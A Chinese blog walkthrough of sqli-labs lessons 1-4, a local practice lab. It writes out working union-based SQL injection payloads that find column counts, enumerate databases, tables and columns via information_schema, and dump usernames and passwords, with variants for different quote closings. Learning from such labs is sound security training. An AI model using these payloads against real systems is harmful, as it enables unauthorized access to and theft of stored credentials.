sqli-labs lesson1-4

最新推荐文章于 2024-05-22 10:33:41 发布
最新推荐文章于 2024-05-22 10:33:41 发布
阅读量253 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43345082/article/details/97574217
本文详细介绍了如何通过SQL注入攻击获取数据库信息,包括不同类型的注入(字符型和数字型)、闭合方式、使用union select进行列数判断、回显判断、数据库名及表名的获取、列名爆破以及最终的数据查询。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

lesson1

首先输入id
http://127.0.0.1/SQl/sqli-labs-master/Less-1/?id=1
在这里插入图片描述

之后加个单引号,会报错,应该是没闭合,字符型
http://127.0.0.1/SQl/sqli-labs-master/Less-1/?id=1
在这里插入图片描述

http://127.0.0.1/SQl/sqli-labs-master/Less-1/?id=1’ and 1=1; %23
在这里插入图片描述
然后order by 判断列数为3
之后判断回显数,发现2,3有回显
http://127.0.0.1/SQl/sqli-labs-master/Less-1/?id=0’ union select 1,2,3; %23
在这里插入图片描述

http://127.0.0.1/SQl/sqli-labs-master/Less-1/?id=0’ union select 1,database(),3; %23查出数据库名security
在这里插入图片描述

?id=0’ union select 1,table_name,3 from information_schema.tables where table_schema=‘security’; %23如果直接查的话只会显示一个表
在这里插入图片描述

用 group_concat()函数将表名拼接成一个字符串

?id=0’ union select 1,(select group_concat(table_name)),3 from information_schema.tables where table_schema=‘security’; %23
在这里插入图片描述

爆列
?id=0’ union select 1,(select group_concat(column_name)),3 from information_schema.columns where table_name=‘users’ and table_schema=‘security’; %23
在这里插入图片描述

查username,password
?id=0’ union select 1,(select group_concat(username)),(select group_concat(password)) from users ; %23
在这里插入图片描述

lesson2

lesson2和lesson1的区别是1是字符型需要闭合
而2是数字型不需要闭合
可以在两个lesson的index.php里看到区别
lesson1
在这里插入图片描述
lesson2
在这里插入图片描述
字符型‘id’需要考虑单引号闭合
id=0’ union xxxxxxx; #
而数字型不需要闭合
直接id=0 union xxxxxxx; #
具体语句参考lesson1

lesson3

直接?id=1’看报错
near ‘‘1’’) LIMIT 0,1’
在这里插入图片描述

猜想查询语句里是这样的 (‘id’)
看了眼源码,跟猜想的一样
在这里插入图片描述
就很好构造了
?id=0’) union XXXXXX; #
具体语句参考lesson1
在这里插入图片描述

lesson4

这道题吧
最开始试了?id=1’ ?id=1’) ?id=1)都没用
后来试到?id=1"有了报错
在这里插入图片描述
猜想查询语句里是这样的 (“id”)
看源码
在这里插入图片描述
(id)???不对啊
在细看发现上边的这句
$id = ‘"’ . $id . ‘"’;给id两边加了双引号
. 在php中是连接符,相当于pyton里的+
于是构造
?id=0") union XXXXXX; #
具体语句参考lesson1
最后查询语句?id=0") union select 1,(select group_concat(username)),(select group_concat(password)) from users ; %23
在这里插入图片描述

Sqli-labs 1-20
2301_80024722的博客
03-09 888
【代码】Sqli-labs 1-20。
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1327
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
sqli-labs Lesson-2详细过程
Brad_的博客
10-16 591
SQLi Labs Lesson4
1ame的博客
08-01 347
Lesson-4 GET Error based Double quotes-string GET类型,基于错误回显的双引号字符串注入 还是进入界面 构造?id=1,结果如图所示 构造?id=1',结果如图所示 发现结果还是 和不加单引号时结果一样,没有任何错误信息。 构造?id=1",结果如图所示 很明显是"双引号闭
SQL注入学习 -- sqli-labs lesson 1
L1am3s
05-14 624
由于对SQL注入不太熟悉,所以就自己搭建了一个sqli-labs的平台.记录一下自己的学习过程首先我们要了解一下常规的数据库名字information_schema() ------  是mysql自带的数据库...
Sqli-labs——lesson4
weixin_62281892的博客
06-28 135
sqlilabs——4
Sqli-labs——lesson13-16
weixin_62281892的博客
07-06 193
lesson13-16
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名...
Sqli-labs靶场第2关详解[Sqli-labs-less-2]
m0_73615178的博客
02-19 798
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
sqli-labs Lesson-1详细过程
Brad_的博客
10-15 710
sqli-labs Lesson-1 根据网上已有教程做得更细化了一些,希望大家共同学习,有错误还望指正。(个人OneNote复制过来为图片)
sqli-labs lesson 1-4通关 解析 学习sql注入
weixin_44286136的博客
05-19 262
lesson 1 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201207164538455.png = 200x150) ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201207164538455.png width=“20%”) 判断是否存在sql注入漏洞
sql注入学习 sqlliab教程 lesson1 (sqlliab搭建教程)
weixin_30828379的博客
02-26 328
靶场搭建 小白建议直接用集成环境.推荐laragon (由于这套靶场较早,需要使用php7.0以下环境,安装完php laragon需要在安装php低版本,默认laragon只集成了一个7.0的php), 如果不懂怎么安装php低版本到laragon,推荐使用php study. 这款集成工具最大的亮点就是集成了php的各个版本,相比于laragon 可能配置则会稍微复杂点.. php st...
SQLi LABS Less-3 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第三关,sqli-labs less 3,sqlilabs less3
sqli-labs---第四关
最新发布
2201_75556700的博客
05-22 545
6、查询用户名和密码字段的值 ,用id分隔开方便观看。4、查询表名(有4张表,我们查询users这张表)3、查询数据库名(库名为security)可判断为字符型闭合,")为闭合方式。2、查询列数,判断回显位置。5、查询users表中字段。id=1'(正常回显)id=1(正常回显)
sql-lab教程Less-1
Brucye
03-22 531
学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema='security'(此处拿security库为例) 查字段:select column_name from information_schema.columns where table_name='users'(此处拿users表
sqli-labs Lesson-4详细过程
Brad_的博客
10-17 585
OneNote粘贴为图片,最好自己动手试一下。
Sqli-labs学习SQL注入-Lesson 1-10总结
weixin_38116282的博客
09-14 517
这几天通过Sqli-labs学习SQL注入-学完Lesson1-10总结下 目前对SQL注入理解就是系统对输入语句处理和过滤不完整导致用户可以查询数据库数据 数据库是Mysql 所以相关语句语法也是Mysql SQL注入- GET型 1.简单注入 1=1 and 1=2 '单引号 "双引号 )括号 通过闭合查询语句 再执行自己的语句 2.盲注         bool布尔型
sql注入学习sqli-lab lesson1
qq_35661990的博客
05-09 1788
之前稍微接触了一下sqli-lab,但是没有继续学下去,最近刷了些web题,发现sqli-lab用来学习数据库和php语言挺有用的。将sqlilab搭在了phpstudy上后(文件解压到phpstudy下的WWW,然后添加站点,之后改host),开始第一课。先根据提示,在url后面加上?id=1(其中问号起到传递参数的作用)。可以看到返回了两个值,通过改变id的值,可以的得到不同的login na...
掌握SQL注入技术的sqli-labs-master教程
标题:“sqli-labs-master” 知识点: sqli-labs-master是一个专门用于练习SQL注入的项目,它为初学者和有经验的开发者提供了一个环境,用于学习、测试和提高SQL注入攻击的技巧。SQL注入是一种代码注入技术,攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值